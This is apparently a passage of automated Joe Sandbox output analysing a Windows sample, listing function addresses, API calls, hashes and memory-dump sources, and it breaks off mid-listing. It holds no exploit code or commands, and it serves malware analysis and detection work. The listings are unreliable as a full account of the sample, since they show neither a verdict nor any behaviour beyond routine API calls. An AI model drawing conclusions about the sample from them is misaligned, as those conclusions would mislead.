                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: a6ff09ff1a0dff70ba7fde48fa5f9c9cb8753413490d38eaa829e99609a59cde
                • Instruction ID: 5d62e37c07803f7cab76792f8906f2312d92cf256246361bea717f6582ea0e84
                • Opcode Fuzzy Hash: a6ff09ff1a0dff70ba7fde48fa5f9c9cb8753413490d38eaa829e99609a59cde
                • Instruction Fuzzy Hash: 9C01B172810308ABC310EB64EC49BAB73ECAB44711F004519FA15D6281DBB09A49CBF2
                Function 00D02198 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                Download Yara Rule
                APIs
                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00D022FD,00000000,?,00D0BC0C,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00D021AE
                • GetLastError.KERNEL32(?,00D0BC0C,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00D022FD,00000000,00000104,?), ref: 00D021B8
                • __dosmaperr.LIBCMT ref: 00D021BF
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ErrorFullLastNamePath__dosmaperr
                • String ID:
                • API String ID: 2398240785-0
                • Opcode ID: ee804e9bbf42c0eed7982cc139a6eafacf5e32a41bcefd9f5ac141749159db37
                • Instruction ID: e470817af901447d04e4eafa906c018a2df58ba0f93aa773100c6a5fb1a89bfe
                • Opcode Fuzzy Hash: ee804e9bbf42c0eed7982cc139a6eafacf5e32a41bcefd9f5ac141749159db37
                • Instruction Fuzzy Hash: B7F06231201215BBCB206F66CC08966BF69FF493603148511BA2CC6150CB31D811E7F1
                Function 00D02201 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                Download Yara Rule
                APIs
                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00D022FD,00000000,?,00D0BB97,00000000,00000000,00D022FD,?,?,00000000,00000000,00000001), ref: 00D02217
                • GetLastError.KERNEL32(?,00D0BB97,00000000,00000000,00D022FD,?,?,00000000,00000000,00000001,00000000,00000000,?,00D022FD,00000000,00000104), ref: 00D02221
                • __dosmaperr.LIBCMT ref: 00D02228
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ErrorFullLastNamePath__dosmaperr
                • String ID:
                • API String ID: 2398240785-0
                • Opcode ID: 7c0fc4efbbbf94b7e553607d0a72e1ecc1959b820874cb3b2f015b56672d1f53
                • Instruction ID: a8b4382af30f44243fc93a0e54b786692384a831770144d1f3d313e9f6024bfa
                • Opcode Fuzzy Hash: 7c0fc4efbbbf94b7e553607d0a72e1ecc1959b820874cb3b2f015b56672d1f53
                • Instruction Fuzzy Hash: ACF04B32201215BBCA206BF6D80CA67BF69FF453A03048515B91CC6260CB31E821DBB4
                Function 00CE04F0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE050D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE054F
                • TerminateProcess.KERNEL32(00000000), ref: 00CE0556
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE055D
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 99ce46128e24a48719d84f25db14ba2d0a6e98be4bc67cb94cc5c6b7a0e63fdb
                • Instruction ID: e20ecf24c48668327e0bea21e19df5377bfa042025b21171354e2347f67ec9c3
                • Opcode Fuzzy Hash: 99ce46128e24a48719d84f25db14ba2d0a6e98be4bc67cb94cc5c6b7a0e63fdb
                • Instruction Fuzzy Hash: 5501D672810304BFC710AFA49C89BEB73ACEB44715F00491DFA55C2241CBB05A49CFE2
                Function 00CE05F0 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE060D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE0651
                • TerminateProcess.KERNEL32(00000000), ref: 00CE0658
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE065F
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: e92db68b2c97750b2f385a95036eefe0704ee3df71d9c7eea693e10c02acc553
                • Instruction ID: 1e3cf9208c5b2a4ffea7d6319bf970bca67da1f48ff4fcf8b61f8ca4ccd2ec7c
                • Opcode Fuzzy Hash: e92db68b2c97750b2f385a95036eefe0704ee3df71d9c7eea693e10c02acc553
                • Instruction Fuzzy Hash: 0601F972814304BBD711AB64EC49BEB77ACEB84715F00091DFD14D6280DBB05A49CBF2
                Function 00CE0570 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE058D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE05D1
                • TerminateProcess.KERNEL32(00000000), ref: 00CE05D8
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE05DF
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 13a9162709aeee2cc6fa51550aa43d7cbbd2ec5dc00bd3ee5072900f8fa53b46
                • Instruction ID: 138f1d5b5c2a5168ce3fed692135d4ed0ecbe9c6e1e4e387303b9d54008f42c6
                • Opcode Fuzzy Hash: 13a9162709aeee2cc6fa51550aa43d7cbbd2ec5dc00bd3ee5072900f8fa53b46
                • Instruction Fuzzy Hash: A601D672814304BBD311AB64AC49BEB77ACEB44711F000519F95596281DBB05A49CBF2
                Function 00CE07F0 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE080D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE0851
                • TerminateProcess.KERNEL32(00000000), ref: 00CE0858
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE085F
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 59d5f0278cced23863a77a8bd5a1aca32257e8e189dffbbcad325342e4fb404f
                • Instruction ID: 797764915a648c6db283357e7ff4ab2b1a56ae16f14de41a099a6e3df13ae9c6
                • Opcode Fuzzy Hash: 59d5f0278cced23863a77a8bd5a1aca32257e8e189dffbbcad325342e4fb404f
                • Instruction Fuzzy Hash: F601F972814304BBD321AB64EC49BEB77ACEB44715F00051DF918D6280DBB06949CBF2
                Function 00CE0980 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE099D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE09E1
                • TerminateProcess.KERNEL32(00000000), ref: 00CE09E8
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE09EF
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 8ac98f421bfe106d7f71786bfd259868c4239748299a0e29635877a1b002dbee
                • Instruction ID: 1161804cab194cd0b2097643e9c4f8b23d74ebcdc2662c7ba8f3ce5560ff7920
                • Opcode Fuzzy Hash: 8ac98f421bfe106d7f71786bfd259868c4239748299a0e29635877a1b002dbee
                • Instruction Fuzzy Hash: 2601D672910304BBD211AB64AC49BEB77ACEB45711F004519F914D6281DBB05949CBB2
                Function 00CE0900 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE091D
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE0961
                • TerminateProcess.KERNEL32(00000000), ref: 00CE0968
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE096F
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: 9f9d9a10b97c8358b712051c2b085413c76f2e430e00fc432e4974788f9d16de
                • Instruction ID: 1a7b61cb2e3b1b74421702c1622adc2ca53a8c4377deb1e1672138ef2a895dc8
                • Opcode Fuzzy Hash: 9f9d9a10b97c8358b712051c2b085413c76f2e430e00fc432e4974788f9d16de
                • Instruction Fuzzy Hash: 3A01F972810304BBD311AFA4EC49BEB77ACEB44711F00051DF914D6281DBB05949CBF2
                Function 00CE0A90 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00000098), ref: 00CE0AAD
                  • Part of subcall function 00CDF9AA: __EH_prolog3_GS.LIBCMT ref: 00CDF9B4
                • GetCurrentProcess.KERNEL32(00000001), ref: 00CE0AF1
                • TerminateProcess.KERNEL32(00000000), ref: 00CE0AF8
                • LeaveCriticalSection.KERNEL32(00000098), ref: 00CE0AFF
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalProcessSection$CurrentEnterH_prolog3_LeaveTerminate
                • String ID:
                • API String ID: 3697725138-0
                • Opcode ID: bccfb2d570da708aa5d27dc2929e17c2e3b23b440a3d3fad93d3ea87c9f0a501
                • Instruction ID: 8abf9542ee0199cd1208295dcbb5ab9845a8b636028ecc083e3096f821609113
                • Opcode Fuzzy Hash: bccfb2d570da708aa5d27dc2929e17c2e3b23b440a3d3fad93d3ea87c9f0a501
                • Instruction Fuzzy Hash: 1001D672810308BBD211AB64EC49BEB77ACEB44715F000519F914D6280DBB05949CBF2
                Function 00CB22E0 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                Download Yara Rule
                APIs
                • ?Clear@XMLDocument@tinyxml2@@QAEXXZ.RWSNDPQSKZ(9FB8111D,00000000,00000000,00D11AD4,000000FF,?,00CA5CF5,?,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB230B
                  • Part of subcall function 00CB23B0: ?DeleteChildren@XMLNode@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB23B4
                  • Part of subcall function 00CB23B0: ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001), ref: 00CB23D5
                • ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(9FB8111D,00000000,00000000,00D11AD4,000000FF,?,00CA5CF5,?,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB2350
                • ??1XMLNode@tinyxml2@@MAE@XZ.RWSNDPQSKZ(9FB8111D,00000000,00000000,00D11AD4,000000FF,?,00CA5CF5,?,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB2357
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Document@tinyxml2@@Node@tinyxml2@@$Children@Clear@DeleteError@Error@2@Pair@tinyxml2@@Reset@
                • String ID:
                • API String ID: 423071938-0
                • Opcode ID: 4643eb4511cf46e216cc678c036e9c5514422073dd1b13f6b9bc4b6604615b31
                • Instruction ID: 68d11f84ca43643069f0c64dcd1f1b4e4d2260a266eb7148b56caefcd6322b53
                • Opcode Fuzzy Hash: 4643eb4511cf46e216cc678c036e9c5514422073dd1b13f6b9bc4b6604615b31
                • Instruction Fuzzy Hash: B2018B31504A84DFC725EB64D882BDAB7E8EB04710F40452EE467836D1EF74BA04DA60
                Function 00CB09E0 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,00CB05D3,?,?,?,00CB0562,?,?,?,00CB23B9,?,?,00CB27AD), ref: 00CB09F4
                • ?MarkInUse@XMLDocument@tinyxml2@@QAEXQBVXMLNode@2@@Z.RWSNDPQSKZ(?,?,00CB05D3,?,?,?,00CB0562,?,?,?,00CB23B9,?,?,00CB27AD,?,?), ref: 00CB0A06
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,00CB05D3,?,?,?,00CB0562,?,?,?,00CB23B9,?,?,00CB27AD,?,?), ref: 00CB0A17
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,00CB05D3,?,?,?,00CB0562,?,?,?,00CB23B9,?,?,00CB27AD,?,?), ref: 00CB0A29
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$Document@tinyxml2@@MarkNode@2@@Use@
                • String ID:
                • API String ID: 3334322719-0
                • Opcode ID: 94e27b4d30814b7c7ad58501d24324d9a7dd0b1e394f7d55ff3be05f981e3f5d
                • Instruction ID: 3187b9819ba19ce457b61e1dad2226e9635f24567650d5d81a90c64b65304d0c
                • Opcode Fuzzy Hash: 94e27b4d30814b7c7ad58501d24324d9a7dd0b1e394f7d55ff3be05f981e3f5d
                • Instruction Fuzzy Hash: 29F01D353003249BCB049F65D8D496EBBAEFF89660705806AED06DB351CF34EC028BA1
                Function 00CB2A00 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                Download Yara Rule
                APIs
                • ?SkipWhiteSpace@XMLUtil@tinyxml2@@SAPBDPBDPAH@Z.RWSNDPQSKZ(?,?,?,?,00CB27FC), ref: 00CB2A13
                  • Part of subcall function 00CA4220: ?IsWhiteSpace@XMLUtil@tinyxml2@@SA_ND@Z.RWSNDPQSKZ(00000001,?,?,00CB2A18,?,?,?,?,00CB27FC), ref: 00CA422B
                  • Part of subcall function 00CA4220: ?IsWhiteSpace@XMLUtil@tinyxml2@@SA_ND@Z.RWSNDPQSKZ(00000001,?,?,?,00CB2A18,?,?,?,?,00CB27FC), ref: 00CA4249
                • ?ReadBOM@XMLUtil@tinyxml2@@SAPBDPBDPA_N@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,00CB27FC), ref: 00CB2A1D
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,0000000D,00000000,00000000,?,?,?,00CB27FC), ref: 00CB2A33
                  • Part of subcall function 00CB28E0: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                  • Part of subcall function 00CB28E0: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,?,?,?,?,00CB27FC), ref: 00CB2A48
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Util@tinyxml2@@$Space@White$Pair@tinyxml2@@$Cmm@@Document@tinyxml2@@Error@Error@2@ReadReset@SkipState@Str@Unlock@
                • String ID:
                • API String ID: 4270378462-0
                • Opcode ID: 792b74e53a338099496bdf0d9f1809cd32d8967fa18d0d0a57bf55a8b782dc51
                • Instruction ID: 7357dc9a1495deb7fe54bf3aeace8f7b95ae106b8d590a81a3f588b30437f1ec
                • Opcode Fuzzy Hash: 792b74e53a338099496bdf0d9f1809cd32d8967fa18d0d0a57bf55a8b782dc51
                • Instruction Fuzzy Hash: FDF0B431A002117BD7256B70AC45FEA7BA9FF52314F100459F50197281EB64685296E1
                Function 00C5C3C0 Relevance: 6.0, APIs: 4, Instructions: 37windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5CED3
